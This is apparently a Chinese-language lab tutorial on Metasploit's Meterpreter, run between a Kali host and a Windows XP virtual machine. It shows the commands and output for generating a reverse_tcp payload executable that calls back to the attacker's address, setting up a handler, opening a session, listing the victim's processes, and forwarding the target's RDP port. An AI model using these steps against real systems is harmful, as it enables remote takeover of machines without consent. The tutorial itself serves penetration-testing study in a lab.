今天来熟悉一下meterpreter,使用环境是KALI、windowsXP
Kali地址:192.168.11.41
windowsXP地址:192.168.11.58
首先生成可执行文件
root@kali:~# msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.11.41 LPORT=444 X > meter.exe
Created by msfpayload (http://www.metasploit.com).
Payload: windows/meterpreter/reverse_tcp
Length: 287
Options: {"LHOST"=>"192.168.11.41", "LPORT"=>"444"}
root@kali:~# ls
192.168.11.42 Desktop meter.exe O OpenVAS_TI.asc开启本地监听
root@kali:~# msfconsole
Call trans opt: received. 2-19-98 13:24:18 REC:Loc
Trace program: running
wake up, Neo...
the matrix has you
follow the white rabbit.
knock, knock, Neo.
(`. ,-,
` `. ,;' /
`. ,'/ .'
`. X /.'
.-;--''--.._` ` (
.' / `
, ` ' Q '
, , `._ \
,.| ' `-.;_'
: . ` ; ` ` --,.._;
' ` , ) .'
`._ , ' /_
; ,''-,;' ``-
``-..__``--`
Taking notes in notepad? Have Metasploit Pro track & report
your progress and findings -- learn more on http://rapid7.com/metasploit
=[ metasploit v4.9.2-2014051401 [core:4.9 api:1.0] ]
+ -- --=[ 1310 exploits - 780 auxiliary - 221 post ]
+ -- --=[ 335 payloads - 35 encoders - 8 nops ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
msf > use exploit/multi/handler
msf exploit(handler) > info
Name: Generic Payload Handler
Module: exploit/multi/handler
Platform: Android, BSD, Java, JavaScript, Linux, OSX, NodeJS, PHP, Python, Ruby, Solaris, Unix, Windows
Privileged: No
License: Metasploit Framework License (BSD)
Rank: Manual
Provided by:
hdm <hdm@metasploit.com>
Available targets:
Id Name
-- ----
0 Wildcard Target
Payload information:
Space: 10000000
Avoid: 0 characters
Description:
This module is a stub that provides all of the features of the
Metasploit payload system to exploits that have been launched
outside of the framework.
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(handler) > info
Name: Generic Payload Handler
Module: exploit/multi/handler
Platform: Android, BSD, Java, JavaScript, Linux, OSX, NodeJS, PHP, Python, Ruby, Solaris, Unix, Windows
Privileged: No
License: Metasploit Framework License (BSD)
Rank: Manual
Provided by:
hdm <hdm@metasploit.com>
Available targets:
Id Name
-- ----
0 Wildcard Target
Payload information:
Space: 10000000
Avoid: 0 characters
Description:
This module is a stub that provides all of the features of the
Metasploit payload system to exploits that have been launched
outside of the framework.
msf exploit(handler) > set LHOST 0.0.0.0
LHOST => 0.0.0.0
msf exploit(handler) > set LPORT 444
LPORT => 444
msf exploit(handler) > show options
Module options (exploit/multi/handler):
Name Current Setting Required Description
---- --------------- -------- -----------
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (accepted: seh, thread, process, none)
LHOST 0.0.0.0 yes The listen address
LPORT 444 yes The listen port
Exploit target:
Id Name
-- ----
0 Wildcard Target
msf exploit(handler) > run
[*] Started reverse handler on 0.0.0.0:444
[*] Starting the payload handler...
[*] Sending stage (770048 bytes) to 192.168.11.58
[*] Meterpreter session 1 opened (192.168.11.41:444 -> 192.168.11.58:1057) at 2015-01-21 01:40:09 -0500
3.在192.168.11.58上执行meter.exe
meterpreter > ifconfig
Interface 1
============
Name : MS TCP Loopback interface
Hardware MAC : 00:00:00:00:00:00
MTU : 1520
IPv4 Address : 127.0.0.1
Interface 2
============
Name : VMware Accelerated AMD PCNet Adapter - pencS zHardware MAC : 00:0c:29:c6:de:84
MTU : 1500
IPv4 Address : 192.168.11.58
IPv4 Netmask : 255.255.255.0
meterpreter > ps
Process List
============
PID PPID Name Arch Session User Path
--- ---- ---- ---- ------- ---- ----
0 0 [System Process] 4294967295
4 0 System x86 0
212 712 vmtoolsd.exe x86 0 NT AUTHORITY\SYSTEM C:\Program Files\VMware\VMware Tools\vmtoolsd.exe
440 384 conime.exe x86 0 WWW-95A235B5556\Administrator C:\WINDOWS\system32\conime.exe
568 4 smss.exe x86 0 NT AUTHORITY\SYSTEM \SystemRoot\System32\smss.exe
636 568 csrss.exe x86 0 NT AUTHORITY\SYSTEM \??\C:\WINDOWS\system32\csrss.exe
668 568 winlogon.exe x86 0 NT AUTHORITY\SYSTEM \??\C:\WINDOWS\system32\winlogon.exe
712 668 services.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\services.exe
724 668 lsass.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\lsass.exe
884 712 vmacthlp.exe x86 0 NT AUTHORITY\SYSTEM C:\Program Files\VMware\VMware Tools\vmacthlp.exe
912 712 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\svchost.exe
976 712 svchost.exe x86 0 C:\WINDOWS\system32\svchost.exe
1072 712 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\System32\svchost.exe
1236 712 svchost.exe x86 0 C:\WINDOWS\system32\svchost.exe
1436 712 svchost.exe x86 0 C:\WINDOWS\system32\svchost.exe
1444 1416 explorer.exe x86 0 WWW-95A235B5556\Administrator C:\WINDOWS\Explorer.EXE
1460 712 ZhuDongFangYu.exe x86 0 NT AUTHORITY\SYSTEM C:\Program Files\360\360Safe\deepscan\zhudongfangyu.exe
1568 1444 cmd.exe x86 0 WWW-95A235B5556\Administrator C:\WINDOWS\system32\cmd.exe
1628 712 spoolsv.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\spoolsv.exe
1784 1444 meter.exe x86 0 WWW-95A235B5556\Administrator $U$C:\Documents and Settings\Administrator.WWW95A235B5556\\meter.exe-0x433a5c446f63756d656e747320616e642053657474696e67735c41646d696e6973747261746f722e5757572d39354132333542353535365cd7c0c3e65c6d657465722e657865
1804 1444 vmtoolsd.exe x86 0 WWW-95A235B5556\Administrator C:\Program Files\VMware\VMware Tools\vmtoolsd.exe
1820 1444 ctfmon.exe x86 0 WWW-95A235B5556\Administrator C:\WINDOWS\system32\ctfmon.exe
4.在192.168.11.58上开启端口反弹,192.168.11.58上的3389端口反弹到192.168.11.41上的2222端口
meterpreter > portfwd -h
Usage: portfwd [-h] [add | delete | list | flush] [args]
OPTIONS:
-L <opt> The local host to listen on (optional).
-h Help banner.
-l <opt> The local port to listen on.
-p <opt> The remote port to connect to.
-r <opt> The remote host to connect to.
meterpreter > portfwd add -l 2222 -r 192.168.11.58 -p 3389
[*] Local TCP relay created: 0.0.0.0:2222 <-> 192.168.11.58:3389
meterpreter > portfwd
0: 0.0.0.0:2222 -> 192.168.11.58:3389
1 total local port forwards.